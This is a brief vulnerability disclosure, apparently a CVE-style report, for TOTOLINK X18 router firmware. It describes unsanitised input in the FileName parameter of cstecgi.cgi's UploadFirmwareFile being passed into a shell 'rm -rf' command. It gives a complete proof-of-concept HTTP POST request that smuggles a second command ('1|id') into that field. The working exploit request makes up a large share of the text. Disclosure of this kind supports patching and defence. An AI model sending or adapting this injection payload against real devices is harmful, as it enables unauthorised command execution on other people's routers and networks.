TOTOLINKļ¼X18 V9.1.0cu.2024_B20220329
TOTOLINKļ¼X18 V9.1.0cu.2021_B20220326
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
The FileName parameter of UploadFirmwareFile in cstecgi.cgi is controllable, and there is no verification of the input FileName parameter. When any error is triggered, the filename parameter will be spliced into the rm- rf command and executed, which will eventually lead to command injection.
CsteSystem comes from the/usr/lib/libcscommon.so. Through analysis, you can know that the command will eventually be executed by calling/bin/bash through execv
Poc:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Origin: <http://192.168.109.161>
Connection: close
Referer: <http://192.168.109.161/basic/mesh.html?timestamp=1667781517612>
Cookie: SESSION_ID=2:1667781512:2
{"FileName": "1|id","ContentLength":"11","topicurl":"UploadFirmwareFile"}
Test screenshot:
